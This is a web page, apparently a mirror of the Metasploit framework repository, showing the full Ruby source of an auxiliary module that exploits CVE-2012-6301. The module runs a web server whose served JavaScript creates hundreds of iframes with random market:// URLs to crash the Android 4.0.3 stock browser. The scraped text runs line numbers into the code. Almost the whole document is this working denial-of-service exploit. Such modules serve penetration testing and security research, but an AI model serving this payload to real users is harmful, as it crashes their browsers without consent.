Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/android/android_stock_browser_iframe.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer78def initialize(info = {})9super(10update_info(11info,12'Name' => "Android Stock Browser Iframe DOS",13'Description' => %q(14This module exploits a vulnerability in the native browser that comes with Android 4.0.3.15If successful, the browser will crash after viewing the webpage.16),17'License' => MSF_LICENSE,18'Author' => [19'Jean Pascal Pereira', # Original exploit discovery20'Jonathan Waggoner' # Metasploit module21],22'References' => [23[ 'PACKETSTORM', '118539'],24[ 'CVE', '2012-6301' ]25],26'DisclosureDate' => '2012-12-01',27'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],28'PassiveActions' => [ 'WebServer' ],29'DefaultAction' => 'WebServer'30)31)32end3334def run35exploit # start http server36end3738def setup39@html = %|40<html>41<body>42<script type="text/javascript">43for (var i = 0; i < 600; i++)44{45var m_frame = document.createElement("iframe");46m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");47document.body.appendChild(m_frame);48}49</script>50</body>51</html>52|53end5455def on_request_uri(cli, _request)56print_status('Sending response')57send_response(cli, @html)58end59end606162